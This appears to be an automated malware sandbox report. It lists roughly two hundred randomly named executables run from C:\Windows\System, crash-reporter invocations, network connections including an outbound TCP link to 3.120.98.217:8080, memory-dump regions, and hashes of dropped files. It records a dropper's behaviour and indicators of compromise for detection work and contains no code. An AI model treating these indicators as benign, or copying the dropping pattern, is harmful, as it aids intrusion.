C:\Windows\System\QEeNVJt.exe

C:\Windows\System\QEeNVJt.exe

C:\Windows\System\PvNLrTt.exe

C:\Windows\System\PvNLrTt.exe

C:\Windows\System\BxRzyat.exe

C:\Windows\System\BxRzyat.exe

C:\Windows\System\pfnzGYL.exe

C:\Windows\System\pfnzGYL.exe

C:\Windows\System\ueTiTDS.exe

C:\Windows\System\ueTiTDS.exe

C:\Windows\System\jafiJAs.exe

C:\Windows\System\jafiJAs.exe

C:\Windows\System\maJhowZ.exe

C:\Windows\System\maJhowZ.exe

C:\Windows\System\ptmFYXx.exe

C:\Windows\System\ptmFYXx.exe

C:\Windows\System\GInjOPW.exe

C:\Windows\System\GInjOPW.exe

C:\Windows\System\AxuWouK.exe

C:\Windows\System\AxuWouK.exe

C:\Windows\System\Egkhrwg.exe

C:\Windows\System\Egkhrwg.exe

C:\Windows\System\KQzUusT.exe

C:\Windows\System\KQzUusT.exe

C:\Windows\System\HiuZIki.exe

C:\Windows\System\HiuZIki.exe

C:\Windows\System\ANaXDvt.exe

C:\Windows\System\ANaXDvt.exe

C:\Windows\System\yCEWCAA.exe

C:\Windows\System\yCEWCAA.exe

C:\Windows\System\cLpJtRS.exe

C:\Windows\System\cLpJtRS.exe

C:\Windows\System\pZgAJbz.exe

C:\Windows\System\pZgAJbz.exe

C:\Windows\System\AxySaAu.exe

C:\Windows\System\AxySaAu.exe

C:\Windows\System\oViuURl.exe

C:\Windows\System\oViuURl.exe

C:\Windows\System\IIkYsIm.exe

C:\Windows\System\IIkYsIm.exe

C:\Windows\System\HDSFvmT.exe

C:\Windows\System\HDSFvmT.exe

C:\Windows\System\EskKmGW.exe

C:\Windows\System\EskKmGW.exe

C:\Windows\System\QdTxhQw.exe

C:\Windows\System\QdTxhQw.exe

C:\Windows\System\DumQgKv.exe

C:\Windows\System\DumQgKv.exe

C:\Windows\System\rmgYXhH.exe

C:\Windows\System\rmgYXhH.exe

C:\Windows\System\WjLookJ.exe

C:\Windows\System\WjLookJ.exe

C:\Windows\System\AyqupJG.exe

C:\Windows\System\AyqupJG.exe

C:\Windows\System\saiGnnk.exe

C:\Windows\System\saiGnnk.exe

C:\Windows\System\YleMOUI.exe

C:\Windows\System\YleMOUI.exe

C:\Windows\System\ccgIqTQ.exe

C:\Windows\System\ccgIqTQ.exe

C:\Windows\System\zVNLUhX.exe

C:\Windows\System\zVNLUhX.exe

C:\Windows\System\oytZsbW.exe

C:\Windows\System\oytZsbW.exe

C:\Windows\System\QoGAZoL.exe

C:\Windows\System\QoGAZoL.exe

C:\Windows\System\FLJQPtS.exe

C:\Windows\System\FLJQPtS.exe

C:\Windows\System\VaCnLgP.exe

C:\Windows\System\VaCnLgP.exe

C:\Windows\System\FiTEnxR.exe

C:\Windows\System\FiTEnxR.exe

C:\Windows\System\qCpDFWU.exe

C:\Windows\System\qCpDFWU.exe

C:\Windows\System\IwQhbgv.exe

C:\Windows\System\IwQhbgv.exe

C:\Windows\System\aAbDpdw.exe

C:\Windows\System\aAbDpdw.exe

C:\Windows\System\CjcXzQD.exe

C:\Windows\System\CjcXzQD.exe

C:\Windows\System\pnxZmZH.exe

C:\Windows\System\pnxZmZH.exe

C:\Windows\System\UbIpcMZ.exe

C:\Windows\System\UbIpcMZ.exe

C:\Windows\System\VqdGqkR.exe

C:\Windows\System\VqdGqkR.exe

C:\Windows\System\skzacKR.exe

C:\Windows\System\skzacKR.exe

C:\Windows\System\uCQISgs.exe

C:\Windows\System\uCQISgs.exe

C:\Windows\System\yMXWWFo.exe

C:\Windows\System\yMXWWFo.exe

C:\Windows\System\SWnrmWT.exe

C:\Windows\System\SWnrmWT.exe

C:\Windows\System\qtPXYrA.exe

C:\Windows\System\qtPXYrA.exe

C:\Windows\System\UHmXkDd.exe

C:\Windows\System\UHmXkDd.exe

C:\Windows\System\ikbMusT.exe

C:\Windows\System\ikbMusT.exe

C:\Windows\System\CCbdvRI.exe

C:\Windows\System\CCbdvRI.exe

C:\Windows\System\IQrzVSZ.exe

C:\Windows\System\IQrzVSZ.exe

C:\Windows\System\GogZPsA.exe

C:\Windows\System\GogZPsA.exe

C:\Windows\System\ZVEEvZl.exe

C:\Windows\System\ZVEEvZl.exe

C:\Windows\System\mqmLcSy.exe

C:\Windows\System\mqmLcSy.exe

C:\Windows\System\uArEJRu.exe

C:\Windows\System\uArEJRu.exe

C:\Windows\System\nMmOXJy.exe

C:\Windows\System\nMmOXJy.exe

C:\Windows\System\NhxCPsq.exe

C:\Windows\System\NhxCPsq.exe

C:\Windows\System\XpvNgPt.exe

C:\Windows\System\XpvNgPt.exe

C:\Windows\System\aYDiiti.exe

C:\Windows\System\aYDiiti.exe

C:\Windows\System\JkBlwix.exe

C:\Windows\System\JkBlwix.exe

C:\Windows\System\VVgSVdg.exe

C:\Windows\System\VVgSVdg.exe

C:\Windows\System\gkwJSyK.exe

C:\Windows\System\gkwJSyK.exe

C:\Windows\System\PBvXstd.exe

C:\Windows\System\PBvXstd.exe

C:\Windows\System\ZplnjHS.exe

C:\Windows\System\ZplnjHS.exe

C:\Windows\System\EiWWhVp.exe

C:\Windows\System\EiWWhVp.exe

C:\Windows\System\ElRbMSa.exe

C:\Windows\System\ElRbMSa.exe

C:\Windows\System\XDoxGWt.exe

C:\Windows\System\XDoxGWt.exe

C:\Windows\System\FkMfNUg.exe

C:\Windows\System\FkMfNUg.exe

C:\Windows\System\gUgtsCc.exe

C:\Windows\System\gUgtsCc.exe

C:\Windows\System\JeTXljB.exe

C:\Windows\System\JeTXljB.exe

C:\Windows\System\sDaFqkb.exe

C:\Windows\System\sDaFqkb.exe

C:\Windows\System\qZzowHO.exe

C:\Windows\System\qZzowHO.exe

C:\Windows\System\GCzTPYJ.exe

C:\Windows\System\GCzTPYJ.exe

C:\Windows\System\CLORjrm.exe

C:\Windows\System\CLORjrm.exe

C:\Windows\System\yaDXLEN.exe

C:\Windows\System\yaDXLEN.exe

C:\Windows\System\YYhYZth.exe

C:\Windows\System\YYhYZth.exe

C:\Windows\System\srokxhz.exe

C:\Windows\System\srokxhz.exe

C:\Windows\System\nkusNUB.exe

C:\Windows\System\nkusNUB.exe

C:\Windows\System\iruQlon.exe

C:\Windows\System\iruQlon.exe

C:\Windows\System\VstOqVu.exe

C:\Windows\System\VstOqVu.exe

C:\Windows\System\klMnmdk.exe

C:\Windows\System\klMnmdk.exe

C:\Windows\System\hlfIrbn.exe

C:\Windows\System\hlfIrbn.exe

C:\Windows\System\rNCtWrk.exe

C:\Windows\System\rNCtWrk.exe

C:\Windows\System\RnSGdXx.exe

C:\Windows\System\RnSGdXx.exe

C:\Windows\System\WjEudfx.exe

C:\Windows\System\WjEudfx.exe

C:\Windows\System\NQGcMQN.exe

C:\Windows\System\NQGcMQN.exe

C:\Windows\System\EsXtAym.exe

C:\Windows\System\EsXtAym.exe

C:\Windows\System\imGuQDx.exe

C:\Windows\System\imGuQDx.exe

C:\Windows\System\YheVfWH.exe

C:\Windows\System\YheVfWH.exe

C:\Windows\System\mfcIPFI.exe

C:\Windows\System\mfcIPFI.exe

C:\Windows\System\LkafMBa.exe

C:\Windows\System\LkafMBa.exe

C:\Windows\System\FvVMMiz.exe

C:\Windows\System\FvVMMiz.exe

C:\Windows\System\FkCYicX.exe

C:\Windows\System\FkCYicX.exe

C:\Windows\System\VUXFAhV.exe

C:\Windows\System\VUXFAhV.exe

C:\Windows\System\GljdpXP.exe

C:\Windows\System\GljdpXP.exe

C:\Windows\System\fbmVCRd.exe

C:\Windows\System\fbmVCRd.exe

C:\Windows\System\htzqJng.exe

C:\Windows\System\htzqJng.exe

C:\Windows\System\hTNizXU.exe

C:\Windows\System\hTNizXU.exe

C:\Windows\System\TKfvEtO.exe

C:\Windows\System\TKfvEtO.exe

C:\Windows\System\pGFalGP.exe

C:\Windows\System\pGFalGP.exe

C:\Windows\System\UtjKtlr.exe

C:\Windows\System\UtjKtlr.exe

C:\Windows\System\HDhUMkc.exe

C:\Windows\System\HDhUMkc.exe

C:\Windows\System\OXDxjEF.exe

C:\Windows\System\OXDxjEF.exe

C:\Windows\System\kBzDsze.exe

C:\Windows\System\kBzDsze.exe

C:\Windows\System\PlQMhtA.exe

C:\Windows\System\PlQMhtA.exe

C:\Windows\System\NcEvWbt.exe

C:\Windows\System\NcEvWbt.exe

C:\Windows\System\NcTYcSt.exe

C:\Windows\System\NcTYcSt.exe

C:\Windows\System\aAIPbSB.exe

C:\Windows\System\aAIPbSB.exe

C:\Windows\System\mjksFnB.exe

C:\Windows\System\mjksFnB.exe

C:\Windows\System\aQnmejw.exe

C:\Windows\System\aQnmejw.exe

C:\Windows\System\SYSSkbo.exe

C:\Windows\System\SYSSkbo.exe

C:\Windows\System\MFzwUJl.exe

C:\Windows\System\MFzwUJl.exe

C:\Windows\System\NzPenyr.exe

C:\Windows\System\NzPenyr.exe

C:\Windows\System\PijZQzm.exe

C:\Windows\System\PijZQzm.exe

C:\Windows\System\LKoGTyW.exe

C:\Windows\System\LKoGTyW.exe

C:\Windows\System\gpbwrsa.exe

C:\Windows\System\gpbwrsa.exe

C:\Windows\System\MKZMxRR.exe

C:\Windows\System\MKZMxRR.exe

C:\Windows\System\dzGAquB.exe

C:\Windows\System\dzGAquB.exe

C:\Windows\System\jbbsvTx.exe

C:\Windows\System\jbbsvTx.exe

C:\Windows\System\hIStFZQ.exe

C:\Windows\System\hIStFZQ.exe

C:\Windows\System\HEogASI.exe

C:\Windows\System\HEogASI.exe

C:\Windows\System\cmjflju.exe

C:\Windows\System\cmjflju.exe

C:\Windows\System\roXCOvJ.exe

C:\Windows\System\roXCOvJ.exe

C:\Windows\System\xhJJmBO.exe

C:\Windows\System\xhJJmBO.exe

C:\Windows\System\PVNrlXy.exe

C:\Windows\System\PVNrlXy.exe

C:\Windows\System\RshYLPU.exe

C:\Windows\System\RshYLPU.exe

C:\Windows\System\ozZblOZ.exe

C:\Windows\System\ozZblOZ.exe

C:\Windows\System\arqejLt.exe

C:\Windows\System\arqejLt.exe

C:\Windows\System\nQAVDgl.exe

C:\Windows\System\nQAVDgl.exe

C:\Windows\System\gLPQdsw.exe

C:\Windows\System\gLPQdsw.exe

C:\Windows\System\RAbVscl.exe

C:\Windows\System\RAbVscl.exe

C:\Windows\System\cpIFHDA.exe

C:\Windows\System\cpIFHDA.exe

C:\Windows\System\OcfdVrC.exe

C:\Windows\System\OcfdVrC.exe

C:\Windows\System\QzZHnub.exe

C:\Windows\System\QzZHnub.exe

C:\Windows\System\hURZknZ.exe

C:\Windows\System\hURZknZ.exe

C:\Windows\System\BzoGOEs.exe

C:\Windows\System\BzoGOEs.exe

C:\Windows\System\uZOIOEs.exe

C:\Windows\System\uZOIOEs.exe

C:\Windows\System\mVryfOx.exe

C:\Windows\System\mVryfOx.exe

C:\Windows\System\sVMcybB.exe

C:\Windows\System\sVMcybB.exe

C:\Windows\System\OKvbeAc.exe

C:\Windows\System\OKvbeAc.exe

C:\Windows\System\gfXPRtQ.exe

C:\Windows\System\gfXPRtQ.exe

C:\Windows\System\YiphJol.exe

C:\Windows\System\YiphJol.exe

C:\Windows\System\EGebloh.exe

C:\Windows\System\EGebloh.exe

C:\Windows\System\HVnKEbP.exe

C:\Windows\System\HVnKEbP.exe

C:\Windows\System\dosBnHK.exe

C:\Windows\System\dosBnHK.exe

C:\Windows\System\nvqPqLS.exe

C:\Windows\System\nvqPqLS.exe

C:\Windows\System\OXtxtQh.exe

C:\Windows\System\OXtxtQh.exe

C:\Windows\System\gyAArSv.exe

C:\Windows\System\gyAArSv.exe

C:\Windows\System\rryBCfj.exe

C:\Windows\System\rryBCfj.exe

C:\Windows\System\drWhckd.exe

C:\Windows\System\drWhckd.exe

C:\Windows\System\CVOrTeF.exe

C:\Windows\System\CVOrTeF.exe

C:\Windows\System\MzpuCdi.exe

C:\Windows\System\MzpuCdi.exe

C:\Windows\System\TqAtqit.exe

C:\Windows\System\TqAtqit.exe

C:\Windows\System\uEdKAOj.exe

C:\Windows\System\uEdKAOj.exe

C:\Windows\System\iPOTTHG.exe

C:\Windows\System\iPOTTHG.exe

C:\Windows\System\rHjxxWi.exe

C:\Windows\System\rHjxxWi.exe

C:\Windows\System\KthDHMg.exe

C:\Windows\System\KthDHMg.exe

C:\Windows\System\yQBdyMC.exe

C:\Windows\System\yQBdyMC.exe

C:\Windows\System\BfGNSwl.exe

C:\Windows\System\BfGNSwl.exe

C:\Windows\System\KASLlmi.exe

C:\Windows\System\KASLlmi.exe

C:\Windows\System\HXjJCXz.exe

C:\Windows\System\HXjJCXz.exe

C:\Windows\System\qgbsBDe.exe

C:\Windows\System\qgbsBDe.exe

C:\Windows\System\xUwnfsN.exe

C:\Windows\System\xUwnfsN.exe

C:\Windows\System\GQAOFPS.exe

C:\Windows\System\GQAOFPS.exe

C:\Windows\System\DLZdMuv.exe

C:\Windows\System\DLZdMuv.exe

C:\Windows\System\TXQMVSM.exe

C:\Windows\System\TXQMVSM.exe

C:\Windows\System\rxxvXpj.exe

C:\Windows\System\rxxvXpj.exe

C:\Windows\System\UXyqrdo.exe

C:\Windows\System\UXyqrdo.exe

C:\Windows\System\IiPflOL.exe

C:\Windows\System\IiPflOL.exe

C:\Windows\System\chnwyIe.exe

C:\Windows\System\chnwyIe.exe

C:\Windows\System\dyQgmsC.exe

C:\Windows\System\dyQgmsC.exe

C:\Windows\System\XtEzAlr.exe

C:\Windows\System\XtEzAlr.exe

C:\Windows\System\uzRwZRB.exe

C:\Windows\System\uzRwZRB.exe

C:\Windows\System\nLsYbUw.exe

C:\Windows\System\nLsYbUw.exe

C:\Windows\System\AbnyYTw.exe

C:\Windows\System\AbnyYTw.exe

C:\Windows\System\xAJnVqs.exe

C:\Windows\System\xAJnVqs.exe

C:\Windows\System\FyJczxA.exe

C:\Windows\System\FyJczxA.exe

C:\Windows\System\WyZGpxG.exe

C:\Windows\System\WyZGpxG.exe

C:\Windows\System\mNpyYRO.exe

C:\Windows\System\mNpyYRO.exe

C:\Windows\System\slNoXlM.exe

C:\Windows\System\slNoXlM.exe

C:\Windows\System\PlzORpR.exe

C:\Windows\System\PlzORpR.exe

C:\Windows\System\rdOotBa.exe

C:\Windows\System\rdOotBa.exe

C:\Windows\System\ShhgsnN.exe

C:\Windows\System\ShhgsnN.exe

C:\Windows\System\caPSkYs.exe

C:\Windows\System\caPSkYs.exe

C:\Windows\System\kvlMlkr.exe

C:\Windows\System\kvlMlkr.exe

C:\Windows\System\PbVVaJX.exe

C:\Windows\System\PbVVaJX.exe

C:\Windows\System\LKfpcli.exe

C:\Windows\System\LKfpcli.exe

C:\Windows\System\nJEaLBE.exe

C:\Windows\System\nJEaLBE.exe

C:\Windows\System\nHWvPxv.exe

C:\Windows\System\nHWvPxv.exe

C:\Windows\System\LkaVFEE.exe

C:\Windows\System\LkaVFEE.exe

C:\Windows\System\uhKQmDl.exe

C:\Windows\System\uhKQmDl.exe

C:\Windows\System\iersgYw.exe

C:\Windows\System\iersgYw.exe

C:\Windows\System\kyCXIAy.exe

C:\Windows\System\kyCXIAy.exe

C:\Windows\System\WVpMJKb.exe

C:\Windows\System\WVpMJKb.exe

C:\Windows\System\LmizchL.exe

C:\Windows\System\LmizchL.exe

C:\Windows\System\uBeeRyj.exe

C:\Windows\System\uBeeRyj.exe

C:\Windows\System\jBaPLbW.exe

C:\Windows\System\jBaPLbW.exe

C:\Windows\System\SBlKeAP.exe

C:\Windows\System\SBlKeAP.exe

C:\Windows\System\QwiphrM.exe

C:\Windows\System\QwiphrM.exe

C:\Windows\System\kqdfHfh.exe

C:\Windows\System\kqdfHfh.exe

C:\Windows\System\gnUNcQI.exe

C:\Windows\System\gnUNcQI.exe

C:\Windows\System\zFfHncM.exe

C:\Windows\System\zFfHncM.exe

C:\Windows\System\LJFPXZE.exe

C:\Windows\System\LJFPXZE.exe

C:\Windows\System\eXrSiLc.exe

C:\Windows\System\eXrSiLc.exe

C:\Windows\System\wkCkCUb.exe

C:\Windows\System\wkCkCUb.exe

C:\Windows\System\gmUQnmg.exe

C:\Windows\System\gmUQnmg.exe

C:\Windows\System\RYdmtNs.exe

C:\Windows\System\RYdmtNs.exe

C:\Windows\System\GqxlEUf.exe

C:\Windows\System\GqxlEUf.exe

C:\Windows\System\oKofPji.exe

C:\Windows\System\oKofPji.exe

C:\Windows\System\ylECVUZ.exe

C:\Windows\System\ylECVUZ.exe

C:\Windows\System\BismCxM.exe

C:\Windows\System\BismCxM.exe

C:\Windows\System\NLdxkqy.exe

C:\Windows\System\NLdxkqy.exe

C:\Windows\System\wgsixeX.exe

C:\Windows\System\wgsixeX.exe

C:\Windows\System\dQuXWHH.exe

C:\Windows\System\dQuXWHH.exe

C:\Windows\System\iZYNCQF.exe

C:\Windows\System\iZYNCQF.exe

C:\Windows\System\DRUseWC.exe

C:\Windows\System\DRUseWC.exe

C:\Windows\System\QqpvYrJ.exe

C:\Windows\System\QqpvYrJ.exe

C:\Windows\System\vLEQFEK.exe

C:\Windows\System\vLEQFEK.exe

C:\Windows\System\IMmosIR.exe

C:\Windows\System\IMmosIR.exe

C:\Windows\System\MjPJDbP.exe

C:\Windows\System\MjPJDbP.exe

C:\Windows\System\mHwsRzo.exe

C:\Windows\System\mHwsRzo.exe

C:\Windows\System\TZhYlXV.exe

C:\Windows\System\TZhYlXV.exe

C:\Windows\System\GglaWXs.exe

C:\Windows\System\GglaWXs.exe

C:\Windows\System\kizoJVe.exe

C:\Windows\System\kizoJVe.exe

C:\Windows\System\iYqUvID.exe

C:\Windows\System\iYqUvID.exe

C:\Windows\System\VLALABx.exe

C:\Windows\System\VLALABx.exe

C:\Windows\System\jjRGHPf.exe

C:\Windows\System\jjRGHPf.exe

C:\Windows\System\oSKOgdq.exe

C:\Windows\System\oSKOgdq.exe

C:\Windows\System\dOpfmyV.exe

C:\Windows\System\dOpfmyV.exe

C:\Windows\System\vUAhTIC.exe

C:\Windows\System\vUAhTIC.exe

C:\Windows\System\nbRRWzK.exe

C:\Windows\System\nbRRWzK.exe

C:\Windows\System\jbxgxiM.exe

C:\Windows\System\jbxgxiM.exe

C:\Windows\System\aKIWKeM.exe

C:\Windows\System\aKIWKeM.exe

C:\Windows\System\YaQZaJY.exe

C:\Windows\System\YaQZaJY.exe

C:\Windows\System\qAqaFSL.exe

C:\Windows\System\qAqaFSL.exe

C:\Windows\System\BqRWApF.exe

C:\Windows\System\BqRWApF.exe

C:\Windows\System\VBHrDKI.exe

C:\Windows\System\VBHrDKI.exe

C:\Windows\System\XXtwGVm.exe

C:\Windows\System\XXtwGVm.exe

C:\Windows\System\zVjVXNs.exe

C:\Windows\System\zVjVXNs.exe

C:\Windows\System\VwbwvrN.exe

C:\Windows\System\VwbwvrN.exe

C:\Windows\System\brhWrpO.exe

C:\Windows\System\brhWrpO.exe

C:\Windows\System\blfGmda.exe

C:\Windows\System\blfGmda.exe

C:\Windows\System\wVCpxkt.exe

C:\Windows\System\wVCpxkt.exe

C:\Windows\System\WItkmkE.exe

C:\Windows\System\WItkmkE.exe

C:\Windows\System\esWmvru.exe

C:\Windows\System\esWmvru.exe

C:\Windows\System\sYHSFoZ.exe

C:\Windows\System\sYHSFoZ.exe

C:\Windows\System\PjSoNrd.exe

C:\Windows\System\PjSoNrd.exe

C:\Windows\System\ldVpkXv.exe

C:\Windows\System\ldVpkXv.exe

C:\Windows\System\WpNHZbq.exe

C:\Windows\System\WpNHZbq.exe

C:\Windows\System\jquTvcl.exe

C:\Windows\System\jquTvcl.exe

C:\Windows\System\bJQJUZy.exe

C:\Windows\System\bJQJUZy.exe

C:\Windows\System\KUqekPL.exe

C:\Windows\System\KUqekPL.exe

C:\Windows\System\AZwliaS.exe

C:\Windows\System\AZwliaS.exe

C:\Windows\System\gWDFFgT.exe

C:\Windows\System\gWDFFgT.exe

C:\Windows\System\BhqEqGi.exe

C:\Windows\System\BhqEqGi.exe

C:\Windows\System\WugYHPZ.exe

C:\Windows\System\WugYHPZ.exe

C:\Windows\System\KWGGJlQ.exe

C:\Windows\System\KWGGJlQ.exe

C:\Windows\System\mSUpdWu.exe

C:\Windows\System\mSUpdWu.exe

C:\Windows\System\BBOfBBl.exe

C:\Windows\System\BBOfBBl.exe

C:\Windows\System\FsfgaDM.exe

C:\Windows\System\FsfgaDM.exe

C:\Windows\System\TnaMPyG.exe

C:\Windows\System\TnaMPyG.exe

C:\Windows\System\HdZyzBj.exe

C:\Windows\System\HdZyzBj.exe

C:\Windows\System\cnuRWnX.exe

C:\Windows\System\cnuRWnX.exe

C:\Windows\System\veXmlds.exe

C:\Windows\System\veXmlds.exe

C:\Windows\System\nxlGSml.exe

C:\Windows\System\nxlGSml.exe

C:\Windows\System\SlesPOU.exe

C:\Windows\System\SlesPOU.exe

C:\Windows\System\RObItDu.exe

C:\Windows\System\RObItDu.exe

C:\Windows\System\QimWawl.exe

C:\Windows\System\QimWawl.exe

C:\Windows\System\PiOQtTJ.exe

C:\Windows\System\PiOQtTJ.exe

C:\Windows\System\cbYJHoF.exe

C:\Windows\System\cbYJHoF.exe

C:\Windows\System\zNGaMbj.exe

C:\Windows\System\zNGaMbj.exe

C:\Windows\System\cFLluYe.exe

C:\Windows\System\cFLluYe.exe

C:\Windows\System\hDNRKre.exe

C:\Windows\System\hDNRKre.exe

C:\Windows\System\XVRAHSy.exe

C:\Windows\System\XVRAHSy.exe

C:\Windows\system32\WerFaultSecure.exe

"C:\Windows\system32\WerFaultSecure.exe" -protectedcrash -p 60 -i 60 -h 472 -j 468 -s 480 -d 0

C:\Windows\system32\WerFaultSecure.exe

C:\Windows\system32\WerFaultSecure.exe -u -p 60 -s 2184

Network

Country Destination Domain Proto
DE 3.120.98.217:8080 tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.110.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 133.110.199.185.in-addr.arpa udp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 github.githubassets.com udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 154.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 185.199.108.154:443 github.githubassets.com tcp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 203.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

memory/3212-0-0x00007FF66B460000-0x00007FF66B856000-memory.dmp

memory/3212-1-0x0000022D59F30000-0x0000022D59F40000-memory.dmp

C:\Windows\System\EWdOxVy.exe

MD5 f5ee345af397590609c67e79d32aa71a
SHA1 70c7d4e59641b7916bfa1ef779c10ce317c0030e
SHA256 0f567c570b6efcabbba95a915ac2842f796f919953757b3f37dcd719867c3ca2
SHA512 38907d09f5a04b75a9271ebd12b4575dcb493beb73d9dcbec7752594d7ac29021dc6a3c2caf59781aecfceebfcbeafbcb77f56325ff4a44c48d9f38428038494

C:\Windows\System\brHqTLB.exe

MD5 0f9b420901f149036eb52a31feb9c95e
SHA1 11dbca6da39716e3860d021dd9ace6bf755f263c
SHA256 c1695ec3da6bff51a54a36c32afabf0874ce39d3b92e26af99e125cfed29a386
SHA512 c25d2daacba6bb5f7d4ad8c35f790fd9b6f810b0a2f688b55c717ea716a420c5693b573a8a0e4d04d4ca8411743d9762427acdf3e99493ded1d92a56f4024aac

C:\Windows\System\IBMKRWO.exe

MD5 53d0cc27d01995a9ab41acab2c2aaecc
SHA1 9244495e6d3c268cbfb71707f2dda260b94e08d2
SHA256 6f34427750c3c3ccc77b90b3aacf02f5b85374275c929434d399921cfafa32a4
SHA512 c7feec26de83eaec13bf0ba1480a40e918b38957ffee8ef31b64bc51cb54dc5f1af07bf95c259877c23e1368c6d9ce294d78efec529f0a2b6471f46a3e40b2b6

memory/1468-25-0x00007FF6F9C50000-0x00007FF6FA046000-memory.dmp

memory/2792-35-0x00007FF64AAF0000-0x00007FF64AEE6000-memory.dmp

C:\Windows\System\OwTpFMC.exe

MD5 b30c6cf6f9e769f81535933ddf2c7497
SHA1 808757f40d9e8ebc9f0733f3881a753ac3a66029
SHA256 f9040b37bc571278d0c781fd7f37a8af5bc59db031c3b07e977d9fc939731ce4
SHA512 7401d3e94b85e724bdf70237208a80a3375ef6141bcbc34e3bcefb3a70410e36e58cee6fde99fa3400e9e606c52407528d4427580337d8dc4feade2870b4470a

C:\Windows\System\Burqpzn.exe

MD5 555f1ec1bda52c7125cd15c5dc93f589
SHA1 ea2aca5d98fdd09c54facfe1776d3aa36e7ef7b6
SHA256 cd2464026385f64f6f193f13d633294ad5a2d097758c5a9f8ff067a248f504a1
SHA512 0d102891c05d643761a1007ed860f757a1d3e483211ac52a11fd953724dca4c072dd7673b7c0b93ced537ed5c1f4543e5c218476a7cb70caf367676b58714e64

C:\Windows\System\RdtjIlK.exe

MD5 40d566bac017db3cac07b9311d3cd3c1
SHA1 4996909526dc2041dbf130412b057c4368acbdfc
SHA256 daa4c44eadd6c6beb6d85d0aab8e02a6403db29f59c6710a06b0937e44e9ab82
SHA512 b188d4b34e438787dbe90070bec18754a7a91d09140bee01050369f41fc0642cc3e246ed6eb7786eba836376b40d64d265ed8ea1d7a5e119082a4508376d14c5

memory/980-772-0x00007FF634210000-0x00007FF634606000-memory.dmp

memory/2564-436-0x000001B8F79C0000-0x000001B8F8166000-memory.dmp

C:\Windows\System\JwmkKWr.exe

MD5 65971be7dec3df289a83fd8db666ac5e
SHA1 a8afaab9a6704d698b00b224d83ebc9ccde3b23a
SHA256 9ad00950a3a79bf7c0b9a6949b3b031a51fc67db724ea427d1efcbb58ced46e8
SHA512 cb57e7b9db8222cb09ec7eeba9b4557e72dbe5f854a3f2090aa832bdc3dd383a650d037d1f72cebc85eb1d23683709f87640bcc55cd9555f598a93569836e4de

C:\Windows\System\SyqIKiE.exe

MD5 abe7bf58536d6caf152bfe70c3717c15
SHA1 5af5359a9cec55d35831485f4616a8ee3214ba56
SHA256 9361d172989ed560aececd1646cb2494a22f3a59e0b078bce514d5019b16f2ff
SHA512 65ee1470e6b2b883e68c190ac99d22d31e0d06f13dcfed4f6590b50aa9feb968e1a5b41a76aad82d1b6e945c851079e7e2c9a90d8e6493e96c208fb33e1de18f

C:\Windows\System\zoOJLVN.exe

MD5 5b4ebd99b4b7d34cbcf6b8485dc7c43f
SHA1 616ae90b03d7f0d559cc0e04803bd073b0473978
SHA256 c3374d7436a91197736ecb3b9bf0777af289276a328b004f21a243877c191779
SHA512 52a36194c3fb89b18b8617e2a18984b38382f9d8744f37b912f3f8b9f74edb787c78efd7045c9f006002035b80064536cb797ea114251511cd854ab3867b3b7e

C:\Windows\System\whoZHnc.exe

MD5 ff3a1293637442abfe1499fc4c5de9c0
SHA1 ab8c8dbb147aa753a8969b657e023d4d16820ec1
SHA256 2007eadfba08cf12601dda181c7271b57467ebc99b3ae7ed030ba354c5736cfc
SHA512 e4d6b2b4edf93c963a64a3b9c812af2a4f4008505b90ddd681158269110198e0220828b92ffa45df400fea49be79589ded9e682b0042310311ee548759c0808c

C:\Windows\System\RLvenfC.exe

MD5 e3b178e63348b876b639dd9da448f9e6
SHA1 be3bfeba296ed7d99c1c930be72a9f9095ad779c
SHA256 3c9f4b2aa1e08801727e30ec64904195d266db5dda714934c94a23f87d6d4c9d
SHA512 e02a0ccad77a4b5292cb12397bb0e0743f3f396e6b56f4bc6073bb18917c87a915b9121ecf71d527df3954027a244903711fdbf46308a06496f239641f903d84

C:\Windows\System\AmtaodT.exe

MD5 2e0b988b929ede19715e6959c1acd8cd
SHA1 bf3a114b80e7952e54a1ee8bf8ec0c80b84d441b
SHA256 892b54d1406bbdabc3a59684fc86c25aa9020d2f4436e8c7970c0682598e14e9
SHA512 fe89b3f61738c1f64460a542fae3f49ed080a69dfac77f78307ca1aa68812608bd2008e03cb2b2377e44f48d46e658718f98636deb92721f648f8b71659737b7

C:\Windows\System\ybHZLWM.exe

MD5 c7e49d02be44b28e209666a23c76b088
SHA1 73fdadfe6017a7b06e93a1b4c5b514836d554725
SHA256 3c1f6eeb79cd08be237ba48f752deb689a3a54c77e8d528286c042805cb85e80
SHA512 18c0cc8f73d43440d4231985f3b79a4688db5187de09267093b089a2e0a13dab096f589bb71167bce85ba85b8805b55498e11695fb2fd3ed07c97e88070ec1b6

C:\Windows\System\nKADzeH.exe

MD5 9337b0a8e904d8f93e99ec3297cf6f42
SHA1 0de6d5277a04e85dbda0c7bd72680b84d90161a3
SHA256 f25fb9894ff607c084c5559657726c74ef690328eec75803274f669e2919fe80
SHA512 fcf01c38bf02727e89134a10ff04e7c536fab764e6c09b93f8ad3a66aa641d07cfa9776c26936d5619fa5561094b6ff947e107ec83c3cc31286bd1f67bf0fb03

C:\Windows\System\trEJEmh.exe

MD5 c93ff1d6958f40695642d94e1426b808
SHA1 c5a730e9506d63b78e545d4780c1dbbbd1f11769
SHA256 1acd1baa6e404c6b2a911413170e50c79162b796e0e79548a45f57236adbd73d
SHA512 8b6ba184a39cf43dd2e62ce89c91e2a4de6368930cf468b4ef91102dffa5e7a5075f8e9d765c1a4d231fa6419403f8f2b57486e33bbd2c0b32df0ced00d2862a

C:\Windows\System\ScQKdch.exe

